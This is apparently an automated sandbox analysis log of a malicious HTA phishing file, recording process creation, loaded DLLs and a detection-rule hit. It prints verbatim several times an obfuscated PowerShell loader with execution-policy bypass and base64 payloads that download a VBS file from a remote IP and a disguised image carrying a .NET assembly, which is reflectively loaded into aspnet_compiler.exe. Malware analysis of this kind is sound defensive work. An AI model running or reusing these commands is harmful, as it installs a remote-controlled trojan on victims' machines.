Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0137FFB1 12_2_0137FFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012C1F92 12_2_012C1F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012CCFE0 12_2_012CCFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012B2FC8 12_2_012B2FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0137EE26 12_2_0137EE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012C0E59 12_2_012C0E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012C9EB0 12_2_012C9EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0137CE93 12_2_0137CE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012D2E90 12_2_012D2E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0137EEDB 12_2_0137EEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: String function: 012F5130 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: String function: 01307E54 appears 96 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: String function: 0133F290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: String function: 012AB970 appears 268 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: String function: 0132EA12 appears 86 times
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Source: Process Memory Space: powershell.exe PID: 3004, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.phis.troj.expl.evad.winHTA@17/16@1/1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\seemybestthingswhatdoingforbetter[1].tiff Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4512:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2644:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2qybaiyi.3df.ps1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswhatdoingforbe.vbS"
Source: C:\Windows\SysWOW64\mshta.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: seemybestdayguvenu.hta ReversingLabs: Detection: 21%
Source: unknown Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\seemybestdayguvenu.hta"
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C poweRshElL.Exe -ex bypaSs -nOp -w 1 -c DEviCECrEdEnTIALDePLOYMENT.ExE ; INvoKe-eXPrESSioN($(INVOKe-EXPressION('[syStEm.text.eNCodinG]'+[cHar]58+[ChAr]0x3A+'Utf8.GEtSTrInG([SYsteM.cOnvErT]'+[ChaR]58+[ChaR]0X3A+'froMbAsE64strinG('+[Char]34+'JHN2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFUmRFZklOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT04uRExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExlU3ZOR3Z3YWtaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWJFcyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhLbWpGVFRlLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGcsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtVGtaVXFXVG53KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkdUIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRzdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjI5Lzc3MC9zZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZXR0ZXIudElGIiwiJEVudjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3doYXRkb2luZ2ZvcmJlLnZiUyIsMCwwKTtTVEFSVC1TTGVlUCgzKTtpSSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZS52YlMi'+[cHAr]34+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poweRshElL.Exe -ex bypaSs -nOp -w 1 -c DEviCECrEdEnTIALDePLOYMENT.ExE ; INvoKe-eXPrESSioN($(INVOKe-EXPressION('[syStEm.text.eNCodinG]'+[cHar]58+[ChAr]0x3A+'Utf8.GEtSTrInG([SYsteM.cOnvErT]'+[ChaR]58+[ChaR]0X3A+'froMbAsE64strinG('+[Char]34+'JHN2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFUmRFZklOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT04uRExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExlU3ZOR3Z3YWtaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWJFcyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhLbWpGVFRlLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGcsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtVGtaVXFXVG53KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkdUIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRzdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjI5Lzc3MC9zZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZXR0ZXIudElGIiwiJEVudjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3doYXRkb2luZ2ZvcmJlLnZiUyIsMCwwKTtTVEFSVC1TTGVlUCgzKTtpSSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZS52YlMi'+[cHAr]34+'))')))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3cxbggpe\3cxbggpe.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA8D6.tmp" "c:\Users\user\AppData\Local\Temp\3cxbggpe\CSC280B62266E03482F8F906EDB13385254.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswhatdoingforbe.vbS"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $doctor = 'JGJlaSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRhbW9uaWVtaWEgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRxdWFscXVlciA9ICRhbW9uaWVtaWEuRG93bmxvYWREYXRhKCRiZWkpOyRhdGVycmFnZW0gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcXVhbHF1ZXIpOyRsZWlyaWEgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGFjYXBuYSA9ICc8PEJBU0U2NF9FTkQ+Pic7JGlucXVpZXR1ZGUgPSAkYXRlcnJhZ2VtLkluZGV4T2YoJGxlaXJpYSk7JHBlY3RhciA9ICRhdGVycmFnZW0uSW5kZXhPZigkYWNhcG5hKTskaW5xdWlldHVkZSAtZ2UgMCAtYW5kICRwZWN0YXIgLWd0ICRpbnF1aWV0dWRlOyRpbnF1aWV0dWRlICs9ICRsZWlyaWEuTGVuZ3RoOyRjb25kaWNlbnRlID0gJHBlY3RhciAtICRpbnF1aWV0dWRlOyRuaWNvbGF0byA9ICRhdGVycmFnZW0uU3Vic3RyaW5nKCRpbnF1aWV0dWRlLCAkY29uZGljZW50ZSk7JG1hZHJpbGhlaXJhID0gLWpvaW4gKCRuaWNvbGF0by5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkbmljb2xhdG8uTGVuZ3RoKV07JGNyZWR1bGlkYWRlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbWFkcmlsaGVpcmEpOyRyZWRpemltYXIgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjcmVkdWxpZGFkZSk7JHJlYmVsbGFkb3IgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKCdWQUknKTskcmViZWxsYWRvci5JbnZva2UoJG51bGwsIEAoJ3R4dC5BQ01BQy8wNzcvOTIuMzIxLjU0Mi4yNzEvLzpwdHRoJywgJyRyYXBhZG8nLCAnJHJhcGFkbycsICckcmFwYWRvJywgJ2FzcG5ldF9jb21waWxlcicsICckcmFwYWRvJywgJyRyYXBhZG8nLCckcmFwYWRvJywnJHJhcGFkbycsJyRyYXBhZG8nLCckcmFwYWRvJywnJHJhcGFkbycsJzEnLCckcmFwYWRvJykpOw==';$theatrelho = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($doctor));Invoke-Expression $theatrelho
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C poweRshElL.Exe -ex bypaSs -nOp -w 1 -c DEviCECrEdEnTIALDePLOYMENT.ExE ; INvoKe-eXPrESSioN($(INVOKe-EXPressION('[syStEm.text.eNCodinG]'+[cHar]58+[ChAr]0x3A+'Utf8.GEtSTrInG([SYsteM.cOnvErT]'+[ChaR]58+[ChaR]0X3A+'froMbAsE64strinG('+[Char]34+'JHN2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFUmRFZklOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT04uRExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExlU3ZOR3Z3YWtaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWJFcyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhLbWpGVFRlLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGcsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtVGtaVXFXVG53KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkdUIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRzdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjI5Lzc3MC9zZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZXR0ZXIudElGIiwiJEVudjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3doYXRkb2luZ2ZvcmJlLnZiUyIsMCwwKTtTVEFSVC1TTGVlUCgzKTtpSSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZS52YlMi'+[cHAr]34+'))')))" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poweRshElL.Exe -ex bypaSs -nOp -w 1 -c DEviCECrEdEnTIALDePLOYMENT.ExE ; INvoKe-eXPrESSioN($(INVOKe-EXPressION('[syStEm.text.eNCodinG]'+[cHar]58+[ChAr]0x3A+'Utf8.GEtSTrInG([SYsteM.cOnvErT]'+[ChaR]58+[ChaR]0X3A+'froMbAsE64strinG('+[Char]34+'JHN2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFUmRFZklOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT04uRExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExlU3ZOR3Z3YWtaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWJFcyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhLbWpGVFRlLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGcsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtVGtaVXFXVG53KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkdUIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRzdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjI5Lzc3MC9zZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZXR0ZXIudElGIiwiJEVudjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3doYXRkb2luZ2ZvcmJlLnZiUyIsMCwwKTtTVEFSVC1TTGVlUCgzKTtpSSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZS52YlMi'+[cHAr]34+'))')))" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3cxbggpe\3cxbggpe.cmdline" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswhatdoingforbe.vbS" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA8D6.tmp" "c:\Users\user\AppData\Local\Temp\3cxbggpe\CSC280B62266E03482F8F906EDB13385254.TMP" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $doctor = 'JGJlaSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRhbW9uaWVtaWEgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRxdWFscXVlciA9ICRhbW9uaWVtaWEuRG93bmxvYWREYXRhKCRiZWkpOyRhdGVycmFnZW0gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcXVhbHF1ZXIpOyRsZWlyaWEgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGFjYXBuYSA9ICc8PEJBU0U2NF9FTkQ+Pic7JGlucXVpZXR1ZGUgPSAkYXRlcnJhZ2VtLkluZGV4T2YoJGxlaXJpYSk7JHBlY3RhciA9ICRhdGVycmFnZW0uSW5kZXhPZigkYWNhcG5hKTskaW5xdWlldHVkZSAtZ2UgMCAtYW5kICRwZWN0YXIgLWd0ICRpbnF1aWV0dWRlOyRpbnF1aWV0dWRlICs9ICRsZWlyaWEuTGVuZ3RoOyRjb25kaWNlbnRlID0gJHBlY3RhciAtICRpbnF1aWV0dWRlOyRuaWNvbGF0byA9ICRhdGVycmFnZW0uU3Vic3RyaW5nKCRpbnF1aWV0dWRlLCAkY29uZGljZW50ZSk7JG1hZHJpbGhlaXJhID0gLWpvaW4gKCRuaWNvbGF0by5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkbmljb2xhdG8uTGVuZ3RoKV07JGNyZWR1bGlkYWRlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbWFkcmlsaGVpcmEpOyRyZWRpemltYXIgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjcmVkdWxpZGFkZSk7JHJlYmVsbGFkb3IgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKCdWQUknKTskcmViZWxsYWRvci5JbnZva2UoJG51bGwsIEAoJ3R4dC5BQ01BQy8wNzcvOTIuMzIxLjU0Mi4yNzEvLzpwdHRoJywgJyRyYXBhZG8nLCAnJHJhcGFkbycsICckcmFwYWRvJywgJ2FzcG5ldF9jb21waWxlcicsICckcmFwYWRvJywgJyRyYXBhZG8nLCckcmFwYWRvJywnJHJhcGFkbycsJyRyYXBhZG8nLCckcmFwYWRvJywnJHJhcGFkbycsJzEnLCckcmFwYWRvJykpOw==';$theatrelho = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($doctor));Invoke-Expression $theatrelho Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mshtml.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msiso.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msimtf.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: jscript9.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d2d1.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dataexchange.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
